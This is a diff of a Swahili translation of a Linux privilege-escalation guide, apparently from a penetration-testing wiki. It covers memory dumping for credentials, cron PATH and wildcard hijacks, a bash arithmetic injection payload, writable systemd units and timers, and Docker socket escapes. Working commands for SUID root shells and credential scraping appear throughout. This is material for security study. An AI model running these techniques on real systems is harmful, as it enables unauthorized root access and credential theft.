+`/dev/mem` hutoa ufikiaji wa kumbukumbu ya mfumo ya **kimwili**, si kumbukumbu ya virtual. Nafasi ya anwani ya virtual ya kernel inaweza kufikiwa kwa kutumia /dev/kmem.\
+Kawaida, `/dev/mem` inaweza kusomwa tu na kundi la **root** na **kmem**.
 ```
 strings /dev/mem -n10 | grep -i PASS
 ```
-### ProcDump kwa linux
+### ProcDump for linux
 
-ProcDump ni toleo jipya la Linux la zana ya ProcDump ya kitambo kutoka kwenye mkusanyiko wa zana za Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
+ProcDump ni utekelezaji wa ProcDump kwa Linux uliotengenezwa upya wa zana ya ProcDump ya jadi kutoka kwenye mkusanyiko wa zana za Sysinternals kwa Windows. Pata kwenye [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
 ```
 procdump -p 1714
 
@@ -264,24 +264,24 @@ Press Ctrl-C to end monitoring without terminating the process.
 [20:20:58 - INFO]: Timed:
 [20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714
 ```
-### Vifaa
+### Zana
 
-Ili kuchoma kumbukumbu ya mchakato unaweza kutumia:
+To dump a process memory you could use:
 
 - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)
-- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kuondoa mahitaji ya root kwa mkono na kuchoma mchakato unaomilikiwa na wewe
+- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Unaweza kuondoa kwa mkono mahitaji ya root na dump mchakato unaomilikiwa na wewe
 - Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root inahitajika)
 
-### Taarifa za kuingia kutoka kumbukumbu za mchakato
+### Nyaraka za Uthibitisho kutoka kwa kumbukumbu ya mchakato
 
-#### Mfano kwa mkono
+#### Mfano wa mkono
 
-Ikiwa utagundua kuwa mchakato wa authenticator unaendesha:
+If you find that the authenticator process is running:
 ```bash
 ps -ef | grep "authenticator"
 root      2027  2025  0 11:46 ?        00:00:00 authenticator
 ```
-Unaweza dump the process (angalia sehemu zilizotangulia ili kupata njia tofauti za dump the memory of a process) na kutafuta credentials ndani ya memory:
+Unaweza dump the process (tazama sehemu zilizopita ili kupata njia tofauti za dump the memory of a process) na kutafuta credentials ndani ya memory:
 ```bash
 ./dump-memory.sh 2027
 strings *.dump | grep -i password
@@ -290,16 +290,16 @@ strings *.dump | grep -i password
 
 Chombo [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) kitafanya **steal clear text credentials from memory** na kutoka kwa baadhi ya **well known files**. Kinahitaji root privileges ili kifanye kazi ipasavyo.
 
-| Kipengele                                         | Jina la Mchakato      |
-| ------------------------------------------------- | --------------------- |
-| GDM password (Kali Desktop, Debian Desktop)       | gdm-password          |
-| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon  |
-| LightDM (Ubuntu Desktop)                          | lightdm               |
-| VSFTPd (Active FTP Connections)                   | vsftpd                |
-| Apache2 (Active HTTP Basic Auth Sessions)         | apache2               |
-| OpenSSH (Active SSH Sessions - Sudo Usage)        | sshd:                 |
+| Sifa                                              | Jina la Mchakato     |
+| ------------------------------------------------- | -------------------- |
+| GDM password (Kali Desktop, Debian Desktop)       | gdm-password         |
+| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
+| LightDM (Ubuntu Desktop)                          | lightdm              |
+| VSFTPd (Active FTP Connections)                   | vsftpd               |
+| Apache2 (Active HTTP Basic Auth Sessions)         | apache2              |
+| OpenSSH (Active SSH Sessions - Sudo Usage)        | sshd:                |
 
-#### Regexes za Utafutaji/[truffleproc](https://github.com/controlplaneio/truffleproc)
+#### Regex za Utafutaji/[truffleproc](https://github.com/controlplaneio/truffleproc)
 ```bash
 # un truffleproc.sh against your current Bash shell (e.g. $$)
 ./truffleproc.sh $$
@@ -313,39 +313,39 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1...
 # finding secrets
 # results in /tmp/tmp.o6HV0Pl3fe/results.txt
 ```
-## Majukumu yaliyopangwa / Cron jobs
+## Kazi Zilizopangwa / Cron jobs
 
-### Crontab UI (alseambusher) inayokimbia kama root – web-based scheduler privesc
+### Crontab UI (alseambusher) inayotumika kama root – web-based scheduler privesc
 
-Ikiwa paneli ya wavuti "Crontab UI" (alseambusher/crontab-ui) inakimbia kama root na imefungwa tu kwenye loopback, bado unaweza kuifikia kupitia SSH local port-forwarding na kuunda privileged job ili escalate.
+Ikiwa paneli ya mtandao “Crontab UI” (alseambusher/crontab-ui) inaendesha kama root na imefungwa kwa loopback pekee, bado unaweza kuifikia kupitia SSH local port-forwarding na kuunda kazi yenye mamlaka ili privesc.
 
 Mnyororo wa kawaida
-- Gundua porti inayofunguka tu kwenye loopback (mfano, 127.0.0.1:8000) na Basic-Auth realm kwa kutumia `ss -ntlp` / `curl -v localhost:8000`
-- Tafuta credentials katika artifacts za uendeshaji:
-  - Backups/scripts zenye `zip -P <password>`
-  - systemd unit inayoonyesha `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."`
-- Tunneli na login:
+- Tambua port inayofungwa kwa loopback pekee (e.g., 127.0.0.1:8000) na Basic-Auth realm kwa kutumia `ss -ntlp` / `curl -v localhost:8000`
+- Pata credentials katika artefakti za uendeshaji:
+- Backups/skripti zenye `zip -P <password>`
+- unit ya systemd inayofunua `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."`
+- Tuneli na ingia:
 ```bash
 ssh -L 9001:localhost:8000 user@target
 # browse http://localhost:9001 and authenticate
 ```
-- Tengeneza kazi yenye ruhusa za juu na iendeshe mara moja (inatoa SUID shell):
+- Unda high-priv job na iendeshe mara moja (drops SUID shell):
 ```bash
 # Name: escalate
 # Command:
 cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell
 ```
-- Tumia hiyo:
+- Tumia:
 ```bash
 /tmp/rootshell -p   # root shell
 ```
-Kuimarisha usalama
-- Usiendeshe Crontab UI kama root; izuilie kwa user maalum na permissions za chini
-- Bind to localhost na pia zuii upatikanaji kupitia firewall/VPN; usitumie passwords zilizotumika tena
-- Epuka kuingiza secrets ndani ya unit files; tumia secret stores au EnvironmentFile ya root pekee
+Kuimarisha
+- Usiruhusu Crontab UI kuendesha kama root; kaza kwa mtumiaji maalum na ruhusa ndogo kabisa
+- Funga kwenye localhost na pia zuia upatikanaji kupitia firewall/VPN; usirudie passwords
+- Epuka kuweka secrets ndani ya unit files; tumia secret stores au root-only EnvironmentFile
 - Washa audit/logging kwa on-demand job executions
 
-Angalia kama kuna scheduled job yoyote yenye udhaifu. Labda unaweza kuchukua faida ya script inayoendeshwa na root (wildcard vuln? unaweza kubadilisha files ambazo root anazitumia? kutumia symlinks? kuunda specific files katika directory ambayo root anaitumia?).
+Angalia kama scheduled job yoyote iko vulnerable. Labda unaweza kuchukua faida ya script inayotekelezwa na root (wildcard vuln? unaweza kubadilisha files ambazo root anazitumia? tumia symlinks? unda files maalum kwenye directory ambayo root anatumia?).
 ```bash
 crontab -l
 ls -al /etc/cron* /etc/at*
@@ -355,24 +355,24 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul
 
 Kwa mfano, ndani ya _/etc/crontab_ unaweza kupata PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
 
-(_Kumbuka jinsi user ana ruhusa za kuandika juu ya /home/user_)
+(_Kumbuka jinsi mtumiaji "user" ana ruhusa za kuandika juu ya /home/user_)
 
-Ikiwa ndani ya crontab hii mtumiaji root anajaribu kutekeleza amri au script bila kuweka PATH. Kwa mfano: _\* \* \* \* root overwrite.sh_\
+Iwapo ndani ya crontab hii mtumiaji root anajaribu kutekeleza amri au script bila kuweka path. Kwa mfano: _\* \* \* \* root overwrite.sh_\
 Kisha, unaweza kupata shell ya root kwa kutumia:
 ```bash
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
 #Wait cron job to be executed
 /tmp/bash -p #The effective uid and gid to be set to the real uid and gid
 ```
-### Cron ikitumia script yenye wildcard (Wildcard Injection)
+### Cron ikitumia script na wildcard (Wildcard Injection)
 
-Kama script inayotekelezwa na root ina “**\***” ndani ya amri, unaweza kuitumia kupata matokeo yasiyotarajiwa (kama privesc). Mfano:
+Kama script inapoendeshwa na root na ina “**\***” ndani ya amri, unaweza kuitumia kufanya mambo yasiyotegemewa (kama privesc). Mfano:
 ```bash
 rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
 ```
-**Ikiwa wildcard imeongozwa na njia kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **sio).**
+**Ikiwa wildcard imewekwa kabla ya njia kama** _**/some/path/\***_ **, haiko hatarini (hata** _**./\***_ **sio).**
 
-Soma ukurasa ufuatao kwa mbinu zaidi za kutumia wildcards:
+Soma ukurasa ufuatao kwa mbinu za ziada za wildcard exploitation:
 
 
 {{#ref}}
@@ -382,11 +382,11 @@ wildcards-spare-tricks.md
 
 ### Bash arithmetic expansion injection in cron log parsers
 
-Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. If a root cron/parser reads untrusted log fields and feeds them into an arithmetic context, an attacker can inject a command substitution $(...) that executes as root when the cron runs.
+Bash hufanya parameter expansion na command substitution kabla ya arithmetic evaluation katika ((...)), $((...)) na let. Ikiwa root cron/parser inasoma fields za logi zisizotegemewa na kuziingiza katika muktadha wa arithmetic, mshambuliaji anaweza kuingiza command substitution $(...) ambayo inatekelezwa kama root wakati cron inapoendesha.
 
-- Kwanini inafanya kazi: Katika Bash, expansions hufanyika kwa mpangilio huu: parameter/variable expansion, command substitution, arithmetic expansion, kisha word splitting na pathname expansion. Kwa hivyo thamani kama `$(/bin/bash -c 'id > /tmp/pwn')0` kwanza inayobadilishwa (kiafanye amri), kisha nambari iliyobaki `0` inatumiwa kwa arithmetic ili script iendelee bila makosa.
+- Kwa nini inafanya kazi: In Bash, expansions hufanyika kwa mpangilio huu: parameter/variable expansion, command substitution, arithmetic expansion, kisha word splitting na pathname expansion. Hivyo thamani kama `$(/bin/bash -c 'id > /tmp/pwn')0` kwanza inabadilishwa (ikiumba command), kisha nambari iliyobaki `0` inatumiwa kwa arithmetic ili script iendelee bila makosa.
 
-- Typical vulnerable pattern:
+- Mfano wa kawaida unaoathirika:
 ```bash
 #!/bin/bash
 # Example: parse a log and "sum" a count field coming from the log
@@ -396,7 +396,7 @@ while IFS=',' read -r ts user count rest; do
 done < /var/www/app/log/application.log
 ```
 
-- Utekelezaji: Pata maandishi yanayodhibitiwa na mshambuliaji yandikwe kwenye log iliyochambuliwa ili uwanja unaoonekana kuwa nambari uwe na command substitution na uishie na tarakimu. Hakikisha amri yako haichapishi kwenye stdout (au iielekeze) ili arithmetic ibaki halali.
+- Exploitation: Pata maandishi yanayotumika na mshambuliaji yaandikwe kwenye logi inayochambuliwa ili uwanja unaonekana kama nambari uwe na command substitution na uishe kwa tarakimu. Hakikisha amri yako haichapishi kwa stdout (au izielekeze) ili arithmetic ibaki halali.
 ```bash
 # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):
 $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0
@@ -405,62 +405,62 @@ $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0
 
 ### Cron script overwriting and symlink
 
-If you **can modify a cron script** executed by root, you can get a shell very easily:
+Ikiwa unaweza **can modify a cron script** executed by root, unaweza kupata shell kwa urahisi sana:
 ```bash
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
 #Wait until it is executed
 /tmp/bash -p
 ```
-Ikiwa script inayotekelezwa na root inatumia **directory ambapo una ufikiaji kamili**, inaweza kuwa ya msaada kufuta folda hiyo na **kuunda folda ya symlink kuelekea nyingine** inayohudumia script unayodhibiti
+Ikiwa script inayotekelezwa na root inatumia **directory ambapo una upatikanaji kamili**, inaweza kuwa muhimu kufuta folder hiyo na **kuunda symlink folder kuelekea nyingine** inayohudumia script unaodhibiti.
 ```bash
 ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
 ```
 ### Cron jobs za mara kwa mara
 
-Unaweza kufuatilia michakato ili kutafuta zile zinazotekelezwa kila dakika 1, 2 au 5. Labda unaweza kuchukua fursa yake na escalate privileges.
+Unaweza kufuatilia processes ili kutafuta zile zinazotekelezwa kila dakika 1, 2 au 5. Huenda ukaweza kutumia fursa hiyo na escalate privileges.
 
-Kwa mfano, ili **kuangalia kila 0.1s kwa muda wa dakika 1**, **panga kwa amri zilizotekelezwa kwa idadi ndogo** na futa amri zilizoendeshwa zaidi, unaweza kufanya:
+Kwa mfano, ili **kutazama kila 0.1s kwa muda wa dakika 1**, **kupanga kwa amri zilizotekelezwa kidogo** na kufuta amri zilizotekelezwa zaidi, unaweza kufanya:
 ```bash
 for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
 ```
-**Unaweza pia kutumia** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (hii itafuatilia na kuorodhesha kila process inayoanza).
+**Unaweza pia kutumia** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (hii itafuatilia na kuorodhesha kila process itakayozinduka).
 
 ### Cron jobs zisizoonekana
 
-Inawezekana kuunda cronjob **kwa kuweka carriage return baada ya comment** (bila newline character), na cronjob itafanya kazi. Mfano (zingatia carriage return char):
+Inawezekana kuunda cronjob **kwa kuweka carriage return baada ya comment** (bila newline character), na cron job itafanya kazi. Mfano (angalia carriage return char):
 ```bash
 #This is a comment inside a cron config file\r* * * * * echo "Surprise!"
 ```
 ## Huduma
 
-### Fayili za _.service_ zinazoweza kuandikwa
+### Faili za _.service_ Zinazoweza Kuandikwa
 
-Angalia kama unaweza kuandika faili yoyote ya `.service`, ikiwa unaweza, unaweza **kuibadilisha** ili **itekeleze** **backdoor yako wakati** huduma inapokuwa **anzishwa**, **ianzishwe upya** au **isimamiswe** (labda utahitaji kusubiri mpaka mashine ianzishwe upya).\
-Kwa mfano tengeneza backdoor yako ndani ya faili ya .service kwa **`ExecStart=/tmp/script.sh`**
+Angalia kama unaweza kuandika faili yoyote ya `.service`. Ikiwa unaweza, unaweza **kuibadilisha** ili iweze **kutekeleza** backdoor yako wakati huduma inapo **anzishwa**, **ianzishwa upya** au **simamishwa** (labda utahitaji kusubiri hadi mashine ianze upya).\
+Kwa mfano, tengeneza backdoor yako ndani ya faili ya .service kwa **`ExecStart=/tmp/script.sh`**
 
-### Binary za huduma zinazoweza kuandikwa
+### Binaries za huduma zinazoweza kuandikwa
 
-Kumbuka kwamba ikiwa una **idhini ya kuandika kwa binaries zinazotekelezwa na services**, unaweza kuzibadilisha kuwa backdoors, hivyo wakati services zitakapotekelezwa tena backdoors zitatekelezwa.
+Kumbuka kwamba ikiwa una **idhini ya kuandika juu ya binaries zinazotekelezwa na huduma**, unaweza kuzibadilisha kuwa backdoor, hivyo wakati huduma zitakaporudi kutekelezwa backdoor nayo itatekelezwa.
 
 ### systemd PATH - Relative Paths
 
-Unaweza kuona PATH inayotumiwa na **systemd** kwa:
+Unaweza kuona PATH inayotumika na **systemd** kwa:
 ```bash
 systemctl show-environment
 ```
-Ikiwa utagundua kuwa unaweza **kuandika** katika yoyote ya folda za njia, unaweza kuwa na uwezo wa **escalate privileges**. Unahitaji kutafuta **relative paths being used on service configurations** katika faili kama:
+Ikiwa ugundua kwamba unaweza **kuandika** katika folda yoyote ya njia hiyo, huenda ukaweza **kupandisha ruhusa**. Unahitaji kutafuta **njia zinazorejea zinazotumika kwenye faili za usanidi wa huduma** kama:
 ```bash
 ExecStart=faraday-server
 ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
 ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"
 ```
-Kisha, tengeneza **executable** yenye **jina lile lile kama binary ya relative path** ndani ya systemd PATH folder ambayo unaweza kuandika, na wakati service itaombwa kutekeleza kitendo kilicho hatarini (**Start**, **Stop**, **Reload**), **backdoor** yako itaendeshwa (watumiaji wasio na ruhusa kawaida hawawezi kuanza/kuzima services lakini angalia kama unaweza kutumia `sudo -l`).
+Kisha, tengeneza **kifaili kinachoendeshwa** chenye **same name as the relative path binary** ndani ya systemd PATH folder unayoweza kuandika, na wakati service itakapoulizwa kutekeleza kitendo hatarishi (**Anza**, **Simamisha**, **Pakia upya**), **backdoor yako itaendeshwa** (watumiaji wasiokuwa na ruhusa kwa kawaida hawawezi kuanza/kuacha services lakini angalia ikiwa unaweza kutumia `sudo -l`).
 
 **Jifunze zaidi kuhusu services kwa `man systemd.service`.**
 
 ## **Timers**
 
-**Timers** ni faili za unit za systemd ambazo jina lao linaisha na `**.timer**` na zinadhibiti faili za `**.service**` au matukio. **Timers** zinaweza kutumika kama mbadala kwa cron kwa kuwa zina msaada uliojengwa kwa ajili ya matukio ya kalenda na matukio ya wakati monotonic na zinaweza kuendeshwa kwa asynchronous.
+**Timers** ni systemd unit files whose name ends in `**.timer**` that control `**.service**` files or events. **Timers** zinaweza kutumika kama mbadala wa cron kwani zina msaada uliojengwa kwa ajili ya matukio ya kalenda na matukio ya wakati monotonic na zinaweza kuendeshwa asynchronously.
 
 Unaweza kuorodhesha timers zote kwa:
 ```bash
@@ -468,58 +468,58 @@ systemctl list-timers --all
 ```
 ### Timers zinazoweza kuandikwa
 
-Kama unaweza kubadilisha timer, unaweza kuifanya itekeleze baadhi ya units za systemd.unit (kama `.service` au `.target`)
+Ikiwa unaweza kubadilisha timer, unaweza kuifanya itekeleze baadhi ya vitu vilivyopo vya systemd.unit (kama `.service` au `.target`)
 ```bash
 Unit=backdoor.service
 ```
-Kwenye nyaraka unaweza kusoma ni nini Unit:
+Katika nyaraka unaweza kusoma ni nini Unit inamaanisha:
 
-> Unit itakayoanzishwa wakati timer hii inapoisha. Hoja ni jina la unit, ambayo sufiksi yake si ".timer". Iwapo haitatajwi, thamani hii kwa kawaida inabaki kuwa service yenye jina lile lile kama timer unit, isipokuwa kwa sufiksi. (Angalia hapo juu.) Inapendekezwa kwamba jina la unit linaloanzishwa na jina la timer unit liwe sawa, isipokuwa kwa sufiksi.
+> Kitengo cha kuanzishwa wakati timer hii itakapomalizika. Hoja ni jina la unit, kiambishi mwisho chake si ".timer". Ikiwa haitajwi, thamani hii kwa kawaida itakuwa service ambayo ina jina sawa na unit ya timer, isipokuwa kwa kiambishi mwisho. (Angalia hapo juu.) Inapendekezwa kwamba jina la unit linaloanzishwa na jina la unit ya timer liwe sawa kabisa, isipokuwa kwa kiambishi mwisho.
 
-Kwa hiyo, ili kutumia vibaya ruhusa hii utahitaji:
+Kwa hivyo, ili kutumia vibaya ruhusa hii unahitaji:
 
-- Tafuta systemd unit fulani (kama a `.service`) ambayo inatekeleza **binary inayoweza kuandikwa**
-- Tafuta systemd unit fulani ambayo inatekeleza **relative path** na una **idhini za kuandika** juu ya **systemd PATH** (ili kujifanya executable hiyo)
+- Tafuta unit ya systemd (kama `.service`) ambayo inatekeleza **binary inayoweza kuandikwa**
+- Tafuta unit ya systemd ambayo inatekeleza **relative path** na uko na **idhini za kuandika** juu ya **systemd PATH** (ili kujifanya executable hiyo)
 
-**Jifunze zaidi kuhusu timers kwa `man systemd.timer`.**
+**Jifunze zaidi kuhusu timers kwa kutumia `man systemd.timer`.**
 
 ### **Kuwezesha Timer**
 
-Ili kuwezesha timer unahitaji ruhusa za root na kutekeleza:
+Ili kuwezesha timer unahitaji ruhusa za root na kuendesha:
 ```bash
 sudo systemctl enable backu2.timer
 Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
 ```
-Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/<WantedBy_section>.wants/<name>.timer`
+Kumbuka the **timer** ina **amilishwa** kwa kuunda symlink yake kwenye `/etc/systemd/system/<WantedBy_section>.wants/<name>.timer`
 
 ## Sockets
 
-Unix Domain Sockets (UDS) huwezesha **mawasiliano ya michakato** kwenye mashine ile ile au tofauti ndani ya modeli za client-server. Zinatumia faili za descriptor za Unix kwa mawasiliano kati ya kompyuta na zinaanzishwa kupitia `.socket` files.
+Unix Domain Sockets (UDS) zinawezesha **mawasiliano ya mchakato** kwenye mashine ile ile au tofauti ndani ya miundo ya client-server. Zinatumia faili za kiashiria za Unix za mawasiliano kati ya kompyuta na zinaanzishwa kupitia `.socket` files.
 
 Sockets zinaweza kusanidiwa kwa kutumia `.socket` files.
 
-**Learn more about sockets with `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vya kuvutia vinaweza kusanidiwa:
+**Jifunze zaidi kuhusu sockets kwa `man systemd.socket`.** Ndani ya faili hii, vigezo kadhaa vya kuvutia vinaweza kusanidiwa:
 
-- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti lakini kwa muhtasari zinatumika **kueleza mahali zitakaposikiliza** socket (njia ya faili ya AF_UNIX socket, IPv4/6 na/au nambari ya port kusikiliza, n.k.)
-- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **instance ya service itaanzishwa kwa kila muunganisho unaokuja** na socket ya muunganisho tu ndiyo itapitishwa kwake. Ikiwa **false**, sockets zote za kusikiliza zenyewe zina **pitishwa kwa service unit iliyozinduliwa**, na service unit moja tu itaanzishwa kwa muunganisho yote. Thamani hii hairuhusiwi kwa datagram sockets na FIFOs ambapo service unit moja inashughulikia trafiki yote inayokuja bila masharti. **Chaguo-msingi ni false**. Kwa sababu za utendaji, inashauriwa kuunda daemons mpya kwa njia inayofaa kwa `Accept=no`.
-- `ExecStartPre`, `ExecStartPost`: Zinachukua mstari mmoja au zaidi wa amri, ambazo zinafanywa **kabla** au **baada** sockets/FIFOs za kusikiliza **kuundwa** na kufungwa kwa mfululizo. Token ya kwanza ya mstari wa amri lazima iwe jina la faili kamili (absolute filename), ikifuatiwa na hoja za mchakato.
-- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo zinafanywa **kabla** au **baada** sockets/FIFOs za kusikiliza **kufungwa** na kuondolewa, mtawalia.
-- `Service`: Inaainisha jina la unit ya **service** itakayoanzishwa pale inapopokea trafiki inayokuja. Mipangilio hii inaruhusiwa tu kwa sockets zenye Accept=no. Chaguo-msingi ni service yenye jina sawa na socket (na kiambatanisho kimebadilishwa). Katika kesi nyingi, haitakuwa lazima kutumia chaguo hili.
+- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti, lakini muhtasari hutumika ili **kuonyesha mahali itakayosikiliza** socket (njia ya faili ya AF_UNIX ya socket, IPv4/6 na/au nambari ya bandari kusikiliza, n.k.)
+- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **service instance inazaliwa kwa kila muunganisho unaoingia** na socket ya muunganisho tu ndiyo hupitishwa kwake. Ikiwa **false**, sockets zote zinasikilizwa zinapitwa kwa **service unit iliyozinduliwa**, na service unit moja tu inazaliwa kwa muunganisho wote. Thamani hii haisiwahi kwa datagram sockets na FIFOs ambapo service unit moja bila sharti hushughulikia trafiki yote inayokuja. **Defaults to false**. Kwa sababu za utendaji, inapendekezwa kuandika daemons mpya kwa njia inayofaa kwa `Accept=no`.
+- `ExecStartPre`, `ExecStartPost`: Zinachukua mstari wa amri mmoja au zaidi, ambayo **hutekelezwa kabla** au **baada** sockets/FIFOs za kusikiliza zinapoundwa na kuunganishwa, mtawalia. Kielelezo cha kwanza cha mstari wa amri lazima kiwe jina kamili la faili, kisha kufuatwa na hoja za mchakato.
+- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo **hutekelezwa kabla** au **baada** sockets/FIFOs za kusikiliza zinapofungwa na kuondolewa, mtawalia.
+- `Service`: Inabainisha jina la **service** unit **kuamsha** juu ya **trafiki inayokuja**. Mipangilio hii inaruhusiwa tu kwa sockets zenye Accept=no. Inatumiwa kwa kutumia service yenye jina sawa na socket (na kiongezi kikibadilishwa). Katika mengi ya matukio, haitakuwa muhimu kutumia chaguo hili.
 
-### Writable .socket files
+### Faili za .socket zinazoweza kuandikwa
 
-Ikiwa utapata faili ya `.socket` ambayo ni **writable**, unaweza **ongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket kuundwa. Kwa hivyo, **huenda utahitaji kusubiri hadi mashine izinduliwe upya.**\
-_Note that the system must be using that socket file configuration or the backdoor won't be executed_
+Ikiwa utapata faili ya `.socket` inayoweza kuandikwa, unaweza **kuongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket itakapoundwa. Kwa hiyo, **huenda utahitaji kusubiri hadi mashine ianzishwe upya.**\
+_Kumbuka kwamba mfumo lazima uwe ukitumia usanidi huo wa faili ya socket au backdoor haitatekelezwa_
 
-### Writable sockets
+### Sockets zinazoweza kuandikwa
 
-Ikiwa **unatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia Unix Sockets na sio faili za konfigurishaji `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu.
+Ikiwa **utatambua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia Unix Sockets na si kuhusu faili za usanidi `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu.
 
-### Enumerate Unix Sockets
+### Orodhesha Unix Sockets
 ```bash
 netstat -a -p --unix
 ```
-### Muunganisho ghafi
+### Muunganisho wa ghafi
 ```bash
 #apt-get install netcat-openbsd
 nc -U /tmp/socket  #Connect to UNIX-domain stream socket
@@ -528,7 +528,7 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket
 #apt-get install socat
 socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type
 ```
-**Mfano la matumizi mabaya:**
+**Exploitation example:**
 
 
 {{#ref}}
@@ -537,48 +537,48 @@ socket-command-injection.md
 
 ### HTTP sockets
 
-Fahamu kuwa kunaweza kuwa na baadhi ya **sockets zinazolisikiza HTTP** maombi (_sizungumzii kuhusu .socket files lakini kuhusu faili zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa:
+Kumbuka kwamba kunaweza kuwa na baadhi ya **sockets listening for HTTP** requests (_Sio ninaozungumzia .socket files, bali files zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa:
 ```bash
 curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
 ```
-If the socket **inajibu kwa ombi la HTTP**, basi unaweza **kuwasiliana** nayo na labda **exploit some vulnerability**.
+If the socket **responds with an HTTP** request, then you can **kuwasiliana** with it and maybe **exploit some vulnerability**.
 
-### Docker Socket Inayoweza Kuandikwa
+### Socket ya Docker inayoweza kuandikwa
 
-The Docker socket, often found at `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa default, it's writable by the `root` user and members of the `docker` group. Kuwa na write access kwenye socket hii kunaweza kusababisha privilege escalation. Hapa kuna muhtasari wa jinsi hili linaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipo.
+The Docker socket, often found at `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa default, inaweza kuandikwa na mtumiaji `root` na wanachama wa kikundi cha `docker`. Kuwa na haki ya kuandika kwenye socket hii kunaweza kusababisha privilege escalation. Hapa kuna muhtasari wa jinsi hii inaweza kufanywa na mbinu mbadala ikiwa Docker CLI haipatikani.
 
 #### **Privilege Escalation with Docker CLI**
 
-Ikiwa una write access kwenye Docker socket, unaweza escalate privileges kwa kutumia amri zifuatazo:
+Ikiwa una haki ya kuandika kwenye Docker socket, unaweza escalate privileges kwa kutumia amri zifuatazo:
 ```bash
 docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
 docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
 ```
-Amri hizi zinakuwezesha kuendesha container yenye upatikanaji wa root kwa filesystem ya host.
+Hizi amri zinakuwezesha kuendesha container yenye ufikiaji wa root kwenye mfumo wa faili wa host.
 
-#### **Kutumia Docker API moja kwa moja**
+#### **Kutumia Docker API kwa moja kwa moja**
 
-Katika matukio ambapo Docker CLI haipatikani, Docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`.
+Katika matukio ambapo Docker CLI haipo, docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`.
 
-1.  **List Docker Images:** Pata orodha ya images zinazopatikana.
+1.  **List Docker Images:** Retrieve the list of available images.
 
 ```bash
 curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json
 ```
 
